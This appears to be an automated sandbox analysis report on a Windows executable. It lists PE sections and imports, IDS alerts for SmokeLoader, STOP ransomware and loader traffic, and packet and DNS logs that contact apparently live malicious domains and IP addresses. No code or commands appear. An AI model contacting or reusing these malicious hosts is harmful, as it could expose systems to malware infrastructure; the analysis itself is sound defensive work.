                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x12200x1c.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x31500x40.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d4.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            .text0x10000x27f7a0x28000False0.786663818359375data7.582759753211569IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                            .data0x290000x2458440x1e00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .rsrc0x26f0000x193980x19400False0.3791963180693069data4.260273203195652IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .reloc0x2890000x332e0x3400False0.22581129807692307data2.52425334561387IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                            RT_ICON0x26f7300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
                                                                                                                            RT_ICON0x2705d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                                                                                                                            RT_ICON0x270e800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
                                                                                                                            RT_ICON0x2734280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                                                                                                                            RT_ICON0x2744d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
                                                                                                                            RT_ICON0x2749880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
                                                                                                                            RT_ICON0x2758300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                                                                                                                            RT_ICON0x2760d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0
                                                                                                                            RT_ICON0x2766400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
                                                                                                                            RT_ICON0x278be80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                                                                                                                            RT_ICON0x279c900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0
                                                                                                                            RT_ICON0x27a6180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
                                                                                                                            RT_ICON0x27aae80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
                                                                                                                            RT_ICON0x27b9900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                                                                                                                            RT_ICON0x27c2380x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0
                                                                                                                            RT_ICON0x27c9000x568Device independent bitmap graphic, 16 x 32 x 8, image size 0
                                                                                                                            RT_ICON0x27ce680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
                                                                                                                            RT_ICON0x27f4100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                                                                                                                            RT_ICON0x2804b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
                                                                                                                            RT_ICON0x2809880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
                                                                                                                            RT_ICON0x2818300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                                                                                                                            RT_ICON0x2820d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0
                                                                                                                            RT_ICON0x2826400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
                                                                                                                            RT_ICON0x284be80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                                                                                                                            RT_ICON0x285c900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0
                                                                                                                            RT_ICON0x2866180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
                                                                                                                            RT_STRING0x286d200x664data
                                                                                                                            RT_STRING0x2873880x59edata
                                                                                                                            RT_STRING0x2879280x29adata
                                                                                                                            RT_STRING0x287bc80x248data
                                                                                                                            RT_STRING0x287e100x582data
                                                                                                                            RT_GROUP_ICON0x286a800x68data
                                                                                                                            RT_GROUP_ICON0x2749380x4cdata
                                                                                                                            RT_GROUP_ICON0x2809200x68data
                                                                                                                            RT_GROUP_ICON0x27aa800x68data
                                                                                                                            RT_VERSION0x286ae80x238data
                                                                                                                            DLLImport
                                                                                                                            KERNEL32.dllGetModuleHandleW, IsBadReadPtr, GetConsoleAliasesLengthA, WaitForMultipleObjectsEx, GetPrivateProfileIntA, FreeConsole, GetVersionExW, WritePrivateProfileStructW, MulDiv, GetModuleFileNameW, CreateActCtxA, WritePrivateProfileStringW, ReplaceFileA, GetStringTypeExA, GetStdHandle, GetLogicalDriveStringsA, OpenMutexW, GetLastError, ReadConsoleOutputCharacterA, GetProcAddress, AttachConsole, SleepEx, VirtualAlloc, _hwrite, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, GetFileType, CreateFileMappingW, FindFirstVolumeMountPointW, GetNumberFormatW, CreateEventW, GetModuleFileNameA, lstrcmpiW, GetModuleHandleA, CreateMutexA, GetFileAttributesExW, GetConsoleCursorInfo, ScrollConsoleScreenBufferA, GetCurrentThreadId, FindAtomW, EnumResourceLanguagesW, DebugBreak, FindNextVolumeA, AddConsoleAliasW, CancelWaitableTimer, GetCommState, WaitForSingleObject, GetLongPathNameA, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapFree, WideCharToMultiByte, SetHandleCount, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, Sleep, ExitProcess, WriteFile, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, HeapSize, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, CreateFileA, CloseHandle
                                                                                                                            USER32.dllCharLowerBuffA
                                                                                                                            GDI32.dllGetCharWidthW, EnumFontsW, GetCharABCWidthsFloatW
                                                                                                                            ADVAPI32.dllMapGenericMask
                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                            192.168.2.38.8.8.857990532045695 05/28/23-10:42:32.589547UDP2045695ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org)5799053192.168.2.38.8.8.8
                                                                                                                            192.168.2.3103.100.211.21849720802839238 05/28/23-10:42:49.105133TCP2839238ETPRO TROJAN Blackmoon CnC Activity4972080192.168.2.3103.100.211.218
                                                                                                                            192.168.2.38.8.8.853975532045695 05/28/23-10:42:39.331614UDP2045695ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org)5397553192.168.2.38.8.8.8
                                                                                                                            211.59.14.90192.168.2.380497142036335 05/28/23-10:42:46.297030TCP2036335ET TROJAN Win32/Filecoder.STOP Variant Public Key Download8049714211.59.14.90192.168.2.3
                                                                                                                            192.168.2.3123.140.161.24349713802036333 05/28/23-10:42:45.165749TCP2036333ET TROJAN Win32/Vodkagats Loader Requesting Payload4971380192.168.2.3123.140.161.243
                                                                                                                            192.168.2.38.8.8.860767532045695 05/28/23-10:42:51.638861UDP2045695ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org)6076753192.168.2.38.8.8.8
                                                                                                                            192.168.2.38.8.8.859636532045695 05/28/23-10:42:45.594129UDP2045695ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org)5963653192.168.2.38.8.8.8
                                                                                                                            175.119.10.231192.168.2.380497112036335 05/28/23-10:42:45.790332TCP2036335ET TROJAN Win32/Filecoder.STOP Variant Public Key Download8049711175.119.10.231192.168.2.3
                                                                                                                            192.168.2.3175.119.10.23149721802020826 05/28/23-10:42:51.341437TCP2020826ET TROJAN Potential Dridex.Maldoc Minimal Executable Request4972180192.168.2.3175.119.10.231
                                                                                                                            192.168.2.3123.140.161.24349713802020826 05/28/23-10:42:45.165749TCP2020826ET TROJAN Potential Dridex.Maldoc Minimal Executable Request4971380192.168.2.3123.140.161.243
                                                                                                                            192.168.2.3211.59.14.9049714802833438 05/28/23-10:42:45.438118TCP2833438ETPRO TROJAN STOP Ransomware CnC Activity4971480192.168.2.3211.59.14.90
                                                                                                                            192.168.2.38.8.8.856924532045695 05/28/23-10:42:38.041315UDP2045695ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org)5692453192.168.2.38.8.8.8
                                                                                                                            192.168.2.3175.119.10.23149721802036333 05/28/23-10:42:51.341437TCP2036333ET TROJAN Win32/Vodkagats Loader Requesting Payload4972180192.168.2.3175.119.10.231
                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            May 28, 2023 10:42:32.626749039 CEST4969880192.168.2.3188.114.97.7
                                                                                                                            May 28, 2023 10:42:32.643356085 CEST8049698188.114.97.7192.168.2.3
                                                                                                                            May 28, 2023 10:42:32.643559933 CEST4969880192.168.2.3188.114.97.7
                                                                                                                            May 28, 2023 10:42:32.643846989 CEST4969880192.168.2.3188.114.97.7
                                                                                                                            May 28, 2023 10:42:32.643882036 CEST4969880192.168.2.3188.114.97.7
                                                                                                                            May 28, 2023 10:42:32.660356998 CEST8049698188.114.97.7192.168.2.3
                                                                                                                            May 28, 2023 10:42:32.660419941 CEST8049698188.114.97.7192.168.2.3
                                                                                                                            May 28, 2023 10:42:32.794167995 CEST8049698188.114.97.7192.168.2.3
                                                                                                                            May 28, 2023 10:42:32.794229984 CEST8049698188.114.97.7192.168.2.3
                                                                                                                            May 28, 2023 10:42:32.794404030 CEST4969880192.168.2.3188.114.97.7
                                                                                                                            May 28, 2023 10:42:32.801357985 CEST4969880192.168.2.3188.114.97.7
                                                                                                                            May 28, 2023 10:42:32.801403999 CEST4969880192.168.2.3188.114.97.7
                                                                                                                            May 28, 2023 10:42:32.817797899 CEST8049698188.114.97.7192.168.2.3
                                                                                                                            May 28, 2023 10:42:32.817853928 CEST8049698188.114.97.7192.168.2.3
                                                                                                                            May 28, 2023 10:42:32.886226892 CEST8049698188.114.97.7192.168.2.3
                                                                                                                            May 28, 2023 10:42:32.886286020 CEST8049698188.114.97.7192.168.2.3
                                                                                                                            May 28, 2023 10:42:32.886405945 CEST4969880192.168.2.3188.114.97.7
                                                                                                                            May 28, 2023 10:42:33.224350929 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:33.469502926 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:33.469827890 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:33.486999035 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:33.931035042 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.219666004 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.219733953 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.219870090 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:34.465065956 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.465104103 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.465127945 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.465153933 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.465260983 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:34.465419054 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:34.709892988 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.709956884 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.710007906 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.710053921 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.710052967 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:34.710103035 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.710150003 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:34.710150957 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.710200071 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.710207939 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:34.710247993 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.710303068 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:34.954205036 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.954272032 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.954317093 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.954428911 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.954431057 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:34.954477072 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.954534054 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:34.954562902 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.954617977 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.954632998 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:34.954668999 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.954749107 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.954766035 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:34.954796076 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.954840899 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.954853058 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:34.954890013 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.954936028 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.954942942 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:34.954983950 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.955030918 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.955041885 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:34.955079079 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:34.955136061 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:35.199152946 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.199218035 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.199345112 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.199345112 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:35.199393034 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.199459076 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:35.199472904 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.199521065 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.199593067 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:35.199688911 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.199764967 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.199811935 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.199835062 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:35.199867010 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.199919939 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:35.199924946 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.199974060 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.200021029 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:35.200021029 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.200067997 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.200114965 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.200118065 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:35.200182915 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.200239897 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:35.200251102 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.200346947 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.200392962 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.200397968 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:35.200439930 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.200484037 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.200486898 CEST4969980192.168.2.3211.119.84.112
                                                                                                                            May 28, 2023 10:42:35.200530052 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            May 28, 2023 10:42:35.200575113 CEST8049699211.119.84.112192.168.2.3
                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            May 28, 2023 10:42:32.589546919 CEST192.168.2.38.8.8.80xc257Standard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:32.904278994 CEST192.168.2.38.8.8.80xf86aStandard query (0)colisumy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:38.041315079 CEST192.168.2.38.8.8.80xd6e3Standard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:38.355895042 CEST192.168.2.38.8.8.80x3c92Standard query (0)speedlab.com.egA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:38.886869907 CEST192.168.2.38.8.8.80xde50Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:39.331614017 CEST192.168.2.38.8.8.80x243cStandard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:43.070905924 CEST192.168.2.38.8.8.80xb406Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:43.229671001 CEST192.168.2.38.8.8.80x2ed4Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.401875973 CEST192.168.2.38.8.8.80x77ceStandard query (0)colisumy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.431500912 CEST192.168.2.38.8.8.80x8f29Standard query (0)zexeq.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.761403084 CEST192.168.2.38.8.8.80xe73Standard query (0)zexeq.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:45.594129086 CEST192.168.2.38.8.8.80x8189Standard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:45.890947104 CEST192.168.2.38.8.8.80xf47cStandard query (0)colisumy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:47.954268932 CEST192.168.2.38.8.8.80xc85bStandard query (0)jp.imgjeoighw.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:51.638860941 CEST192.168.2.38.8.8.80xe5cbStandard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:54.714950085 CEST192.168.2.38.8.8.80x5de4Standard query (0)speedlab.com.egA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:55.529817104 CEST192.168.2.38.8.8.80x7a51Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:55.681421041 CEST192.168.2.38.8.8.80x53d3Standard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:56.441360950 CEST192.168.2.38.8.8.80xea1dStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:58.053306103 CEST192.168.2.38.8.8.80x1becStandard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:58.214225054 CEST192.168.2.38.8.8.80x510aStandard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:58.662609100 CEST192.168.2.38.8.8.80xe283Standard query (0)colisumy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:59.579483986 CEST192.168.2.38.8.8.80x96deStandard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:00.048898935 CEST192.168.2.38.8.8.80xe540Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:00.516808987 CEST192.168.2.38.8.8.80x54a7Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:00.802059889 CEST192.168.2.38.8.8.80x113fStandard query (0)colisumy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:02.195458889 CEST192.168.2.38.8.8.80xd66dStandard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:02.941838980 CEST192.168.2.38.8.8.80x92d5Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:03.434844971 CEST192.168.2.38.8.8.80x101bStandard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:03.660417080 CEST192.168.2.38.8.8.80xe0Standard query (0)zexeq.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:03.803510904 CEST192.168.2.38.8.8.80x8f41Standard query (0)speedlab.com.egA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:03.819369078 CEST192.168.2.38.8.8.80xb3c7Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:04.294127941 CEST192.168.2.38.8.8.80x1e46Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:04.570935965 CEST192.168.2.38.8.8.80x85fbStandard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:06.353408098 CEST192.168.2.38.8.8.80x31d6Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.111479998 CEST192.168.2.38.8.8.80x3334Standard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.327681065 CEST192.168.2.38.8.8.80x2d2aStandard query (0)colisumy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.336113930 CEST192.168.2.38.8.8.80x2e88Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.402429104 CEST192.168.2.38.8.8.80xa3e4Standard query (0)colisumy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.588644981 CEST192.168.2.38.8.8.80x46dfStandard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.848572016 CEST192.168.2.38.8.8.80x608bStandard query (0)colisumy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.851380110 CEST192.168.2.38.8.8.80xda79Standard query (0)colisumy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:09.456056118 CEST192.168.2.38.8.8.80x8697Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:09.716829062 CEST192.168.2.38.8.8.80x3a74Standard query (0)colisumy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:10.560178041 CEST192.168.2.38.8.8.80x1df7Standard query (0)zexeq.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:11.273484945 CEST192.168.2.38.8.8.80x7c33Standard query (0)zexeq.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.075567961 CEST192.168.2.38.8.8.80xac40Standard query (0)zexeq.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.679893017 CEST192.168.2.38.8.8.80xe9cStandard query (0)zexeq.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:14.498408079 CEST192.168.2.38.8.8.80xe7f0Standard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:14.852189064 CEST192.168.2.38.8.8.80x9473Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:15.460896015 CEST192.168.2.38.8.8.80x6efcStandard query (0)speedlab.com.egA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:15.613418102 CEST192.168.2.38.8.8.80xfbcaStandard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:15.983059883 CEST192.168.2.38.8.8.80x5091Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:16.217313051 CEST192.168.2.38.8.8.80xd095Standard query (0)colisumy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:16.640816927 CEST192.168.2.38.8.8.80xca04Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:17.003221989 CEST192.168.2.38.8.8.80x450dStandard query (0)colisumy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:18.466842890 CEST192.168.2.38.8.8.80x1f9bStandard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:18.764915943 CEST192.168.2.38.8.8.80x2085Standard query (0)colisumy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:19.449069977 CEST192.168.2.38.8.8.80x3028Standard query (0)adsmanager.facebook.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:19.758980036 CEST192.168.2.38.8.8.80x1826Standard query (0)zexeq.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.059639931 CEST192.168.2.38.8.8.80xad6cStandard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.712938070 CEST192.168.2.38.8.8.80xa0b6Standard query (0)zexeq.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.815661907 CEST192.168.2.38.8.8.80x9518Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:21.989151955 CEST192.168.2.38.8.8.80xe689Standard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:22.024241924 CEST192.168.2.38.8.8.80x3f8aStandard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:22.393553972 CEST192.168.2.38.8.8.80xa2dStandard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:22.731909990 CEST192.168.2.38.8.8.80xe43Standard query (0)ss.apjeoighw.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:23.587229967 CEST192.168.2.38.8.8.80x5e33Standard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:23.942609072 CEST192.168.2.38.8.8.80x4fc2Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:24.187830925 CEST192.168.2.38.8.8.80x30c4Standard query (0)colisumy.comA (IP address)IN (0x0001)false
